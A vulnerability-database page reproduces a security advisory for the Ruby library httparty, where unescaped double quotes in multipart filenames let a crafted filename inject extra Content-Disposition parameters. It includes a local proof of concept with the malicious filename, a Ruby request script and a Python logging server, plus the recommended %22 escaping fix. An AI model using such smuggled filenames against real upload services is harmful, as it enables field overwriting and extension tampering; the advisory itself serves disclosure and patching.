Vulnerability Database

352,928

Total vulnerabilities in the database

httparty has multipart/form-data request tampering vulnerability — httparty

External Control of Assumed-Immutable Web Parameter

Impact

I found "multipart/form-data request tampering vulnerability" caused by Content-Disposition "filename" lack of escaping in httparty.

httparty/lib/httparty/request > body.rb > def generate_multipart

https://github.com/jnunemaker/httparty/blob/4416141d37fd71bdba4f37589ec265f55aa446ce/lib/httparty/request/body.rb#L43

By exploiting this problem, the following attacks are possible

  • An attack that rewrites the "name" field according to the crafted file name, impersonating (overwriting) another field.
  • Attacks that rewrite the filename extension at the time multipart/form-data is generated by tampering with the filename

For example, this vulnerability can be exploited to generate the following Content-Disposition.

> Normal Request example: > normal input filename: abc.txt > > generated normal header in multipart/form-data > Content-Disposition: form-data; name="avatar"; filename="abc.txt"

> Malicious Request example > malicious input filename: overwrite_name_field_and_extension.sh"; name="foo"; dummy=".txt > > generated malicious header in multipart/form-data: > Content-Disposition: form-data; name="avatar"; filename="overwrite_name_field_and_extension.sh"; name="foo"; dummy=".txt"

The Abused Header has multiple name ( avatar & foo ) fields and the "filename" has been rewritten from *.txt to *.sh .

These problems can result in successful or unsuccessful attacks, depending on the behavior of the parser receiving the request. I have confirmed that the attack succeeds, at least in the following frameworks

  • Spring (Java)
  • Ktor (Kotlin)
  • Ruby on Rails (Ruby)

The cause of this problem is the lack of escaping of the " (Double-Quote) character in Content-Disposition > filename.

WhatWG's HTML spec has an escaping requirement.

https://html.spec.whatwg.org/#multipart-form-data

> For field names and filenames for file fields, the result of the encoding in the previous bullet point must be escaped by replacing any 0x0A (LF) bytes with the byte sequence %0A, 0x0D (CR) with %0D and 0x22 (") with %22. The user agent must not perform any other escapes.

Patches

As noted at the beginning of this section, encoding must be done as described in the HTML Spec.

https://html.spec.whatwg.org/#multipart-form-data

> For field names and filenames for file fields, the result of the encoding in the previous bullet point must be escaped by replacing any 0x0A (LF) bytes with the byte sequence %0A, 0x0D (CR) with %0D and 0x22 (") with %22. The user agent must not perform any other escapes.

Therefore, it is recommended that Content-Disposition be modified by either of the following

> Before: > Content-Disposition: attachment;filename="malicious.sh";dummy=.txt

> After: > Content-Disposition: attachment;filename="%22malicious.sh%22;dummy=.txt"

https://github.com/jnunemaker/httparty/blob/4416141d37fd71bdba4f37589ec265f55aa446ce/lib/httparty/request/body.rb#L43

file_name.gsub('"', '%22')

Also, as for \r, \n, URL Encode is not done, but it is not newlines, so it seemed to be OK. However, since there may be omissions, it is safer to URL encode these as well, if possible. ( \r to %0A and \d to %0D )

PoC

PoC Environment

OS: macOS Monterey(12.3) Ruby ver: ruby 3.1.2p20 httparty ver: 0.20.0 (Python3 - HTTP Request Logging Server)

PoC procedure

(Linux or MacOS is required. This is because Windows does not allow file names containing " (double-quote) .)

  1. Create Project
$ mkdir my-app $ cd my-app $ gem install httparty
  1. Create malicious file
$ touch 'overwrite_name_field_and_extension.sh"; name="foo"; dummy=".txt'
  1. Generate Vuln code
$ vi example.rb require 'httparty' filename = 'overwrite_name_field_and_extension.sh"; name="foo"; dummy=".txt' HTTParty.post('http://localhost:12345/', body: { name: 'Foo Bar', email: '[email protected]', avatar: File.open(filename) } )
  1. Run Logging Server

I write Python code, but any method will work as long as you can see the HTTP Request Body. (e.g. Debugger, HTTP Logging Server, Packet Capture)

$ vi logging.py

from http.server import HTTPServer from http.server import BaseHTTPRequestHandler class LoggingServer(BaseHTTPRequestHandler): def do_POST(self): self.send_response(200) self.end_headers() self.wfile.write("ok".encode("utf-8")) content_length = int(self.headers['Content-Length']) post_data = self.rfile.read(content_length) print("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", str(self.path), str(self.headers), post_data.decode('utf-8')) self.wfile.write("POST request for {}".format(self.path).encode('utf-8')) ip = '127.0.0.1' port = 12345 server = HTTPServer((ip, port), LoggingServer) server.serve_forever()

$ python logging.py

  1. Run & Logging server
$ run example.rb

Return Request Header & Body:

> User-Agent: Ruby > Content-Type: multipart/form-data; boundary=------------------------F857UcxRc2J1zFOz > Connection: close > Host: localhost:12345 > Content-Length: 457 > > --------------------------F857UcxRc2J1zFOz > Content-Disposition: form-data; name="name" > > Foo Bar > --------------------------F857UcxRc2J1zFOz > Content-Disposition: form-data; name="email" > > [email protected] > --------------------------F857UcxRc2J1zFOz > Content-Disposition: form-data; name="avatar"; filename="overwrite_name_field_and_extension.sh"; name="foo"; dummy=".txt" > Content-Type: text/plain > > abc > --------------------------F857UcxRc2J1zFOz--

Content-Disposition: > Content-Disposition: form-data; name="avatar"; filename="overwrite_name_field_and_extension.sh"; name="foo"; dummy=".txt"

  • name fields is duplicate (avator & foo)
  • filename & extension tampering ( .txt --> .sh )

References

  1. I also include a similar report that I previously reported to Firefox. https://bugzilla.mozilla.org/show_bug.cgi?id=1556711

  2. I will post some examples of frameworks that did not have problems as reference.

Golang https://github.com/golang/go/blob/e0e0c8fe9881bbbfe689ad94ca5dddbb252e4233/src/mime/multipart/writer.go#L144

Spring https://github.com/spring-projects/spring-framework/blob/4cc91e46b210b4e4e7ed182f93994511391b54ed/spring-web/src/main/java/org/springframework/http/ContentDisposition.java#L259-L267

Symphony https://github.com/symfony/symfony/blob/123b1651c4a7e219ba59074441badfac65525efe/src/Symfony/Component/Mime/Header/ParameterizedHeader.php#L128-L133

For more information

If you have any questions or comments about this advisory:

  • Published: Jan 3, 2023
  • Updated: Apr 14, 2023
  • GHSA: GHSA-5pq7-52mg-hr42
  • Severity: Medium
  • Exploit:
  • CISA KEV:

CVSS v3:

  • Severity: Unknown
  • Score:
  • AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

CWEs:

Software From Fixed in
Ruby icon httparty - 0.21.0

Frequently Asked Questions

A security vulnerability is a weakness in software, hardware, or configuration that can be exploited to compromise confidentiality, integrity, or availability. Many vulnerabilities are tracked as CVEs (Common Vulnerabilities and Exposures), which provide a standardized identifier so teams can coordinate patching, mitigation, and risk assessment across tools and vendors.

CVSS (Common Vulnerability Scoring System) estimates technical severity, but it doesn't automatically equal business risk. Prioritize using context like internet exposure, affected asset criticality, known exploitation (proof-of-concept or in-the-wild), and whether compensating controls exist. A "Medium" CVSS on an exposed, production system can be more urgent than a "Critical" on an isolated, non-production host.

A vulnerability is the underlying weakness. An exploit is the method or code used to take advantage of it. A zero-day is a vulnerability that is unknown to the vendor or has no publicly available fix when attackers begin using it. In practice, risk increases sharply when exploitation becomes reliable or widespread.

Recurring findings usually come from incomplete Asset Discovery, inconsistent patch management, inherited images, and configuration drift. In modern environments, you also need to watch the software supply chain: dependencies, containers, build pipelines, and third-party services can reintroduce the same weakness even after you patch a single host. Unknown or unmanaged assets (often called Shadow IT) are a common reason the same issues resurface.

Use a simple, repeatable triage model: focus first on externally exposed assets, high-value systems (identity, VPN, email, production), vulnerabilities with known exploits, and issues that enable remote code execution or privilege escalation. Then enforce patch SLAs and track progress using consistent metrics so remediation is steady, not reactive.

SynScan combines attack surface monitoring and continuous security auditing to keep your inventory current, flag high-impact vulnerabilities early, and help you turn raw findings into a practical remediation plan.